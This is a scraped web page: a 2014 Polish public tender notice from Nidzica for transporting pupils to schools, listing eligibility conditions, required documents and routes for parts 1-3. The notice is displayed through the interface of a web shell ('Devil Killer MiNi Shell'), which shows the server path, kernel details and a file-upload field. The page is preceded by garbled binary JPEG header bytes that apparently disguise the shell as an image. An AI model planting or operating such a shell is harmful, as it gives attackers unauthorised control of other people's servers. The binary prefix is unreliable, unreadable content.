JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140809/266628-N-2014.html

<p class="kh_header"><b>Nidzica: Dowożenie uczniów do placówek oświatowych, dla których organem prowadzącym jest gmina Nidzica w roku szkolnym 2014/2015</b><br>
<b>Numer ogłoszenia: 266628 - 2014; data zamieszczenia: 09.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Oświaty i Sportu w Nidzicy , ul. Kolejowa 5, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 89 6252457, faks 89 6252457.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://nidzica-zoois.bip-wm.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowożenie uczniów do placówek oświatowych, dla których organem prowadzącym jest gmina Nidzica w roku szkolnym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dowożenie dzieci do placówek oświatowych, dla których organem prowadzącym jest gmina Nidzica wraz z zapewnieniem opieki w roku szkolnym 2014/2015 na podstawie zakupu biletów miesięcznych.
2.Przedmiot zamówienia obejmuje usługi transportowe uczniów wraz z zapewnieniem opieki.
3. Pod pojęciem usługa transportu  rozumie się bezpieczne dowożenie dzieci z miejsca ich zamieszkania (punktów wskazanych w miejscowości przez szkołę) do szkoły oraz odwożenie ze szkoły do miejsca zamieszkania (do punktów wskazanych w miejscowości przez szkołę).
4. Pod pojęciem zapewnienia opieki przez opiekuna rozumie się zapewnienie warunków bezpieczeństwa uczniom podczas przejazdu, przy wsiadaniu i wysiadaniu z autobusu oraz podczas przejścia do szkoły. Opiekunem uczniów nie może być kierowca autobusu. Opiekun autobusu ponosi odpowiedzialność za uczniów dowożonych od chwili wejścia uczniów do autobusu na przystanku w swojej miejscowości. Za bezpieczeństwo uczniów dochodzących do autobusu oraz powracających do domu po przywozie do swojej miejscowości odpowiedzialność ponoszą rodzice/ opiekunowie prawni.  Podczas  dowozu opiekun szkolnego autobusu odprowadza uczniów pod drzwi wejściowe szkoły i przekazuje ich wyznaczonej przez dyrektora osobie . Podczas  odwozu opiekun autobusu odbiera uczniów pod drzwi wejściowe szkoły i wprowadza do autobusu zgodnie z ustalonym porządkiem. Opiekun ma obowiązek posiadania listy obecności dzieci dowożonych/odwożonych do placówki. Ilość opiekunów musi być dostosowana do liczby wykonywanych kursów w taki sposób, aby w każdym wykonywanym kursie był opiekun. 
5. Usługa będzie świadczona w terminie od 1 września  2014 r. do 26 czerwca 2015 r. (włącznie) w dni nauki szkolnej wg ustalonego z dyrektorami szkół rozkładu kursów autobusów, który będzie dostosowany do planów zajęć placówki. Szczegółowe rozkłady godzin dowozów i odwozów uczniów zostaną ustalone przez dyrektorów poszczególnych placówek na 5 dni przed rozpoczęciem roku szkolnego.
6. Dyrektorzy placówek przekażą Wykonawcy imienne listy uczniów uprawnionych do dowozów.
7. Zamówienie realizowane będzie na podstawie biletów miesięcznych.
8. Z przewozów będą korzystać dzieci przedszkolne, uczniowie szkoły podstawowej oraz gimnazjum na podstawie biletów miesięcznych wydanych przez Wykonawcę.
9. Przewozy uczniów odbywać się mogą wyłącznie środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz.U. z 2005, Nr 108, poz. 908 z późn. zm.) i innych przepisach związanych z przewozem osób, ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2012 r. poz. 1265). 
10.Podmiot, który będzie realizował przedmiot zamówienia będzie zobowiązany zabezpieczyć odpowiednią liczbę środków transportu z odpowiednią ilością miejsc siedzących dostosowaną do ilości dowożonych uczniów. 
11.Szczegółowy opis i zakres przedmiotu zamówienia zawiera:
Wzór  umowy stanowiący załącznik nr 1 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, które polegać by miały na zwiększeniu ilości dowożonych dzieci na tych samych trasach stanowiących nie więcej niż 10% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że posiada ważne zezwolenie lub licencję na wykonywanie krajowego transportu drogowego osób wydane na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2012r. ,poz. 1265 ze zm.).
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych przez wykonawcę dokumentów (potwierdzenia posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesję, zezwolenie lub licencję) i oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ złożonego przez wykonawcę na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na dowozie dzieci i sprawowaniu opieki nad nimi o wartości tej usługi nie mniejszej niż: dla części I-VII - 200.000 zł, dla części VIII- XII - 20.000 zł., z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych przez wykonawcę dokumentów (Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania  i podmiotów, na rzecz których usługi zostały wykonane zgodnie z wzorem stanowiącym załącznik nr 6 do SIWZ oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie) i oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ złożonego przez wykonawcę na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w celu potwierdzenia tego warunku.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ złożonego przez wykonawcę na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa szczegółowych wymagań w celu potwierdzenia tego warunku.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ złożonego przez wykonawcę na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związane z przedmiotem zamówienia  na kwotę nie mniejszą niż: dla części I-VII-  200.000 zł., dla części od VIII- XII- 20.000 zł.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych przez wykonawcę dokumentów (opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia) i oświadczenia o spełnieniu warunków udziału w postępowaniu wg wzoru stanowiącego załącznik nr 3 do SIWZ na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy. 2. Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania wykonawcy zgodnie z aktualnym odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej. 3. Pełnomocnictwo, o którym mowa w pkt 1 i 2 powinno być przedstawione w formie oryginału lub kopii poświadczonej notarialnie. 4.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.5.formularz oferty stanowiący załącznik nr 2a-2l do SIWZ wraz z zawartym w nim oświadczeniem o zakresie prac, jakie Wykonawca zamierza zlecić podwykonawcy lub podaniem przez wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 . 6.Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których wyżej mowa, zastępuje się je dokumentem zawierającym oświadczenie, w którym, określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem- wystawione z odpowiednią datą wymaganą dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, którego oferta zostanie uznana przez Zamawiającego za ofertę najkorzystniejszą, zostanie podpisana umowa będąca przedmiotem niniejszego postępowania stanowiąca załącznik nr 1 do SIWZ. 
2. Zamawiający dopuszcza możliwość wprowadzenia następujących zmian w umowie:  
1)wystąpienie prawnych ograniczeń, obiektywnych okoliczności uniemożliwiających realizację umowy lub działanie siły wyższej.
3.Każda zmiana, o której mowa w ust. 2 wymaga złożenia wniosku przez Wykonawcę do Zamawiającego oraz  akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://nidzica-zoois.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Oświaty i Sportu 
13-100 Nidzica 
ul. Kolejowa 5
woj. Warmińsko- Mazurskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 08:00, miejsce: Zespół Obsługi Oświaty i Sportu (sekretariat)
13-100 Nidzica 
ul. Kolejowa 5
woj. Warmińsko- Mazurskie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowożenie uczniów do Szkoły Podstawowej w  Łynie na trasie Nidzica- Dobrzyń- Wietrzychówko- Wietrzychowo- Łyna- Żelazno- Bolejny- Wólka Orłowska-Orłowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Wietrzychowo-Łyna- 26 biletów miesięcznych
-	Nidzica-Żelazno-Łyna- 20 biletów miesięcznych
-	Nidzica-Bolejny-Łyna- 4 bilety miesięczne
-	Nidzica-Wólka Orłowska-Łyna- 13 biletów miesięcznych
-	Nidzica-Wietrzychówko-Łyna 2 bilety miesięczne
-	Nidzica-Dobrzyń-Łyna 2 bilety miesięczne
-	Nidzica-Orłowo-Łyna- 11 biletów miesięcznych
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowożenie uczniów do Zespołów Szkół Nr 1, 2 i 3 w Nidzicy na trasie Nidzica - Zagrzewo- Robaczewo- Nidzica- Rozdroże- Nidzica- Szerokopaś- Litwinki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Zagrzewo-Nidzica- 51 biletów
-	Nidzica-Robaczewo-Nidzica 17 biletów
-	Nidzica-Rozdroże-Nidzica 49 biletów
-	Nidzica-Szerokopaś-Nidzica 19 biletów
-	Nidzica-Litwinki-Nidzica 19 biletów
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości    (dla miejscowości Zagrzewo, Robaczewo przewidywane są 2 przywozy poranne  i 2 odwozy)
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowożenie uczniów do Zespołów Szkół Nr 1 i 2 w Nidzicy na trasie Nidzica -Piotrowice-Magdaleniec-Modłki-Bartoszki-Grzegórzki-Robaczewo-Waszulki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Piotrowice-Nidzica- 19 biletów
-	Nidzica-Magdaleniec-Nidzica- 24 bilety
-	Nidzica-Modłki-Nidzica- 11 biletów
-	Nidzica-Bartoszki-Nidzica- 24 bilety
-	Nidzica-Grzegórzki-Nidzica- 22 bilety
-	Nidzica-Robaczewo-Nidzica- 1 bilet
-	Nidzica-Waszulki-Nidzica- 5 biletów
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
